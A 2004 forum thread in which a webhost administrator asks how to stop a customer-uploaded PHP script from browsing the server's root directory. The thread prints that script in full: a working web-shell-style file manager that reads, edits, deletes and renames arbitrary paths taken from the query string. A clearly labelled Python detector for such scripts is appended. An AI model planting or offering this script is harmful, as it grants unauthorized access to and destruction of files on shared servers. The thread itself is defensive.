LinuxQuestions.org


Zoey_The_Cat 05-02-2004 09:37 PM

Uploaded Script can view /
 
I help administrate for a webhost. Recently a PHP script was uploaded and when executed, the person can see / and its subdirs on the server. I'm pretty sure it's read-only, but I don't like it. How would I go about fixing it, so this isn't possible? I do have the PHP file if anyone needs to view it.

I can supply the server stats if needed.

Thanks!

david_ross 05-03-2004 03:05 PM

Welcome to LQ.

You can use php safe mode:
http://www.php.net/features.safe-mode

It would be worthwhile letting your customers know this is happening as some scripts may need modifying to work in this environment.

Zoey_The_Cat 05-03-2004 03:19 PM

Quote:

Originally posted by david_ross
Welcome to LQ.

You can use php safe mode:
http://www.php.net/features.safe-mode

It would be worthwhile letting your customers know this is happening as some scripts may need modifying to work in this environment.

Excellent, thanks.

Zoey_The_Cat 05-03-2004 04:02 PM

Well, I tried enabling it, and putting some of the commands that are in the offending PHP file into the 'commands-to-disable-unless-you-own-it' part, saved it, restarted Apache, but it appears to have done nothing.

Am I doing something wrong?

Here's the script, if it helps:

PHP Code:


<?PHP
// View a file: the path is dir + file, taken straight from the query string
if(isset($_GET['file']) && isset($_GET['dir'])){
    $fp = @fopen($_GET['dir'].$_GET['file'], "r");
    $content = @fread($fp, filesize($_GET['dir'].$_GET['file']));
    $content = highlight_string($content, 1);
    echo "<html><head><title>Read</title></head><body><a href='".$PHP_SELF."?dir=".$_GET['dir']."'>Go Back<br><a href='".$PHP_SELF."?edit=".$_GET['file']."&dir=".$_GET['dir']."'>Edit | <a href='".$PHP_SELF."?delete=".$_GET['file']."&dir=".$_GET['dir']."'>Delete | <a href='".$PHP_SELF."?rename=".$_GET['file']."&dir=".$_GET['dir']."'>Rename<br><br><p>".$content."</p></body></html>";
// List a directory: any path the web server user can read, including /
}elseif(isset($_GET['dir']) && !isset($_GET['file']) && !isset($_GET['edit']) && !isset($_GET['delete']) && !isset($_GET['rename'])){
    if(substr($_GET['dir'], -1) == "/"){
        $current = $_GET['dir'];
    }else{
        $current = $_GET['dir']."/";
    }
    $dir = @opendir($current);
    echo "<html><head><title>Browsing '$current'</title></head><body>";
    echo "Listing:<br><hr><br>";
    while($file = @readdir($dir)){
        echo $file." <a href='".$PHP_SELF."?dir=$current$file'>Open Dir | <a href='".$PHP_SELF."?file=$file&dir=$current'>Open File<br>";
    }
    @closedir($dir);
    echo "<hr></body></html>";
// Edit a file: writes the POSTed content if the web server user has write permission
}elseif(isset($_GET['edit']) && isset($_GET['dir'])){
    if(isset($_POST['change'])){
        $change = html_entity_decode($_POST['change']);
        $fp = @fopen($_GET['dir'].$_GET['edit'], "w");
        $result = @fwrite($fp, $change);
        if(!$result){
            echo "Error Writing File";
        }else{
            header("location: ".$PHP_SELF."?file=".$_GET['edit']."&dir=".$_GET['dir']);
        }
    }else{
        $fp = @fopen($_GET['dir'].$_GET['edit'], "r");
        $result = @fread($fp, filesize($_GET['dir'].$_GET['edit']));
        $result = htmlentities($result);
        echo "<html><head><title>Editing '".$_GET['edit']."'</title></head><body><center><form action='".$PHP_SELF."?edit=".$_GET['edit']."&dir=".$_GET['dir']."' method='POST'><textarea name='change' rows='40' cols='60'>".$result."</textarea><br><input type='submit' name='submit' value='Edit'></form></center></body></html>";
    }
// Delete a file
}elseif(isset($_GET['delete']) && isset($_GET['dir'])){
    $result = @unlink($_GET['dir'].$_GET['delete']);
    if(!$result){
        echo "File could not be deleted";
    }else{
        header("location: ".$PHP_SELF."?dir=.");
    }
// Rename a file
}elseif(isset($_GET['rename'])){
    if(isset($_POST['change'])){
        $result = @rename($_GET['rename'], $_POST['change']);
        if(!$result){
            echo "File could not be renamed!";
        }else{
            header("location: ".$PHP_SELF."?file=".$_POST['change']."&dir=".$_POST['dir']);
        }
    }else{
        echo "<html><head><title>Rename</title></head><body><center><form action='".$PHP_SELF."?rename=".$_GET['rename']."&dir=".$_GET['dir']."' method='POST'><input type='dir' name='change' value='".$_GET['dir']."'><input type='text' name='change' value='".$_GET['rename']."'><br><input type='submit' value='Rename'></form></center></body></html>";
    }
// No parameters: show the form that asks for a directory
}else{
    echo "<html><head><title>Get Directory</title></head><body><center><form action='".$PHP_SELF."' method='GET'><input type='text' name='dir'><br><input type='submit' value='Get Directory'></form></center></body></html>";
}
?>
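
Besides restricting PHP itself, a host can look for this pattern in customer uploads. The Python sketch below is an added example, not part of the thread: it flags PHP filesystem calls whose arguments come from request data, following one level of variable assignment. The function list, the regexes and the SAMPLE lines are constructed for illustration (the sample mirrors calls from the script above), and it is a line-based heuristic, not a PHP parser.

```python
import re

# Filesystem functions to watch (assumed list; includes those the posted script uses).
FS_FUNCS = ("fopen", "opendir", "unlink", "rename", "fwrite", "file_get_contents")
REQUEST = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"^\s*(\$\w+)\s*=(?!=)\s*(.+);")
CALL = re.compile(r"\b(%s)\s*\(([^;]*)\)" % "|".join(FS_FUNCS))

# Constructed sample: three request-driven calls and one benign fopen().
SAMPLE = r'''<?php
$current = $_GET['dir'];
$dir = @opendir($current);
$fp = @fopen($_GET['dir'].$_GET['edit'], "w");
$result = @unlink($_GET['dir'].$_GET['delete']);
$log = fopen("/var/log/app.log", "a");
?>'''

def scan_php(source):
    """Return [(line_no, function)] for filesystem calls fed by request data."""
    tainted = set()   # variables currently holding request-derived values
    findings = []

    def is_tainted(expr):
        if REQUEST.search(expr):
            return True
        return any(re.search(re.escape(v) + r"\b", expr) for v in tainted)

    for no, line in enumerate(source.splitlines(), 1):
        # Check calls first, so a variable reassigned on this line is judged
        # by the value it held when the call was made.
        for m in CALL.finditer(line):
            if is_tainted(m.group(2)):
                findings.append((no, m.group(1)))
        m = ASSIGN.match(line)
        if m:
            var, rhs = m.groups()
            if is_tainted(rhs):
                tainted.add(var)
            else:
                tainted.discard(var)   # overwritten with a clean value
    return findings

if __name__ == "__main__":
    for line_no, func in scan_php(SAMPLE):
        print("line %d: %s() called with request-derived path" % (line_no, func))
```
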



All times are GMT -5.